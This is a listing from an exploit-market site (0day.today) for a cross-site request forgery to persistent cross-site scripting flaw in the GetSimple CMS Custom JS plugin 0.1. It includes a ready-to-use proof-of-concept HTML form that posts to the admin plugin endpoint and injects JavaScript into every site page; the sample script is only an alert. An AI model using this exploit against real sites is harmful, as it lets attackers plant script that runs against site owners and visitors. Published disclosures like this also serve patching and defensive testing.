[ 授权 ] [ 注册 ] [ 恢复账号 ]
联系我们
你可以由此方式联系我们:
0day.today   漏洞利用市场和0day漏洞利用数据库

GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS Vulnerability

作者
Abhishek Joshi
风险
[
安全风险级别 - 中
]
0day-ID
0day-ID-36036
类别
web applications
添加日期
26-03-2021
平台
php
# Exploit Title: GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS
# Exploit Author: Abhishek Joshi 
# Vendor Homepage: http://get-simple.info/extend/plugin/custom-js/1267 / http://get-simple.info/download
# Software Link: http://get-simple.info/extend/export/5260/1267/custom-js.zip
# Version: 0.1 
# Tested On: Windows 10 Pro + XAMPP + PHP Version 7.4.10
# Tested against: Firefox 78.7.0esr (64-bit)

# Vulnerability Description:
# Cross-Site Request Forgery (CSRF) vulnerability in Custom JS v0.1 plugin for GetSimple CMS allows remote attackers to inject arbitrary client-side script code into every webpage hosted on the CMS (Persistent Cross-Site Scripting), when an authenticated admin visiting a third-party site.

## CSRF POST Form Method
<html><body>
    <form action="http://mygetsimplecms.local/admin/load.php?id=CustomJSPlugin" method="POST">
      <input type="hidden" name="customjs_url_content" value="">
      <input type="hidden" name="customjs_js_content" value="alert('Hello Abhishek Joshi from CSRF --> XSS all the things!')">
      <input type="hidden" name="submit" value="Save Settings">
      <input type="submit" value="Submit request">
    </form>
</body></html>

#  0day.today [2024-07-01]  #